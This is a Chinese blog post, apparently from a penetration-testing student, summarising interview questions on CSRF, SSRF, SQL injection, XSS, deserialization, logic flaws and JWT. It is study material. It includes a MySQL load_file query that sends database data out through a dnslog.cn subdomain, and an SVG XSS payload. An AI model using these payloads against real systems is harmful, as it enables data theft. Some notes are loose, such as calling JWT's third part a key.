zoukankan      html  css  js  c++  java
  • 渗透测试实习生面试总结

    水了好长一段时间了,是时候静下心来好好学习了。前段时间经历了人生中第一次面试,做做总结,查漏补缺。

    面试问题

    top 10

    • CSRF 修复方式

      • get 类型
        填加 token 或者验证码,因为单纯验证 referer 极易被绕过(如将链接留在评论留言处)
      • post 类型
        验证 referer 可有效防止(注意 referer 为空的特殊情况)。构造表单无法伪造 referer,只能简单将其置为空(meta 标签)
    • SSRF 利用方式及修复方法

    • SQL注入

      • SQL 语句
        增删改查基本语句使用。
      • 基本分类
        数字型,字符型,搜索型;union 注入,堆叠注入,报错注入,(布尔、时间)盲注
      • 判断数据库类型
        mysql 有特殊表;不同的数据库函数库不同;盲注的话可通过数据库名称的长度判断是什么数据库
      • 宽字节注入原理
        %df造成字符吞噬
      • dns 外带数据
        利用 mysql (Windows 适用)中的 load_file() 函数,select load_file(concat("\\",version(),".1ndex.dnslog.cn//1ndex.txt"));
        当查询的数据中有特殊符号时,可使用 hex() 函数外带,select load_file(concat("\\",hex(version()),".1ndex.dnslog.cn//1ndex.txt"));,数据过长不行
    • 反序列化

      • PHP 反序列化
        传送门
      • Python 反序列化
        传送门
      • JAVA 反序列化
        最近在整
      • 不同语言反序列化漏洞的区别
    • XSS

      • 过滤
        httponly;针对一般输入点:实体编码,特征字符过滤;富文本:事件过滤,特殊函数过滤
      • svg 图片 XSS
        <svg><script>alert(1)</script></svg>
      • 跨域
        可跨域的标签:script,link,img (frame 可以吗?)
        跨域的方法:jsonp,ajax

    逻辑漏洞

    • 普通价格漏洞成因及修复方法
      • 成因
        后端未校验订单金额与实际到账金额是否匹配
      • 修复
    • 越权

    内网

    • linux 提权
    • 其他没学

    app

    • 怎样判断 app 是二次打包的
      当时不知道问的到底是加了壳还是被植入恶意代码后打包

      • 加壳
        传送门
      • 植入恶意代码
        校验 MD5
    • 组件安全
      四大组件可能存在的漏洞

    tcp

    • 三次握手
    • 全连接半连接扫描
      传送门,全连接(SYN+SYN/ACK),半连接(SYN),全连接扫描准确性高,半连接扫描隐蔽性高

    其他

    • 有没有关注最近新出的漏洞

    • 学校经历

    另一个师傅问的问题

    • jsonp 劫持

      • 危害
      • 防御
        跟防御 CSRF 一样
    • 密码学

      • CBC
    • CORS

    • JWT 三段分别代表什么
      加密算法、数据、密钥

    • 编程题

    • RCE

  • 相关阅读:
    UVA 254 Towers of Hanoi
    UVA 701 The Archeologists' Dilemma
    UVA 185 Roman Numerals
    UVA 10994 Simple Addition
    UVA 10570 Meeting with Aliens
    UVA 306 Cipher
    UVA 10160 Servicing Stations
    UVA 317 Hexagon
    UVA 10123 No Tipping
    UVA 696 How Many Knights
  • 原文地址:https://www.cnblogs.com/wjrblogs/p/14350387.html
Copyright © 2011-2022 走看看